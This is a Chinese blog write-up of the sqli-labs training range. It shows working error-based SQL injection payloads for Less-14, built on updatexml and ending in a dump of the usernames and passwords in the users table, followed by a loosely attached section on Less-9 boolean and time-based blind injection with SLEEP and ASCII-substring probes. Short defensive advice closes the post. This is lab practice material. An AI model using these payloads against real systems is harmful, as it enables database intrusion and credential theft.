sqli-labs靶场Less-14

1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd

  1. 判断是否是数字形传参
  2. 判断是否有单引号闭合
  3. 判断是否是双引号闭合
  4. 判断是否单引号+括号闭合
  5. 判断是否是双引号+括号闭合

如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入

 2、使用报错注入获取库名

" and updatexml(1,concat(0x7e,(select database())),1) -- qwe

 3、获取表名

 " and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe

4、获取字段名

admin" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),1) -- qwe

 5、获取数据

" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 2,1)),1)-- qwe

### SQLi-Labs Less 9 解决方案及详细说明 #### 背景介绍 SQLi-Labs 是一个用于练习和学习 SQL 注入技术的 Web 应用程序集合。Less 9 属于布尔盲注类型,通过条件查询来推断数据库中的数据。 #### 测试环境设置 为了测试 SQL 注入漏洞,确保已安装并配置好 SQLi-Labs 靶场环境,并访问 `http://localhost/sqli-labs/Less-9/` 页面[^1]。 #### 基本原理 在 Less 9 中,应用程序接受用户输入作为参数传递给后台 SQL 查询语句的一部分。当输入特定构造的数据时,可以影响 SQL 执行逻辑,从而泄露信息或执行其他恶意操作。此级别主要利用了 MySQL 的错误处理机制来进行注入攻击验证。 #### 实验步骤分析 对于该级别的实验,可以通过向 URL 参数 id 后面附加不同的有效载荷(payload),观察页面返回的结果差异来判断是否存在漏洞以及如何进一步挖掘有用的信息: - 尝试使用 `' AND SLEEP(5)--` 来检测延时响应特性; - 使用二分法猜测字符集范围内的每一个字母直到匹配成功为止; 例如,要确认第一个字符是否为 'a' 可以发送如下请求: ```bash http://localhost/sqli-labs/Less-9/?id=1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1),1,1))>97--+ ``` 如果上述条件成立,则表示目标表名的第一个字符位于ASCII码大于97的位置上(即'a'之后)。继续调整比较值直至找到确切位置即可获取所需信息片段。 #### 安全防护建议 为了避免此类安全风险的发生,在实际开发过程中应当采取措施防止 SQL 注入攻击,比如采用预编译语句(prepared statements) 或者存储过程(stored procedures)[^2]。此外还可以启用 WAF(Web Application Firewall) 对异常流量进行过滤拦截,增强系统的整体安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值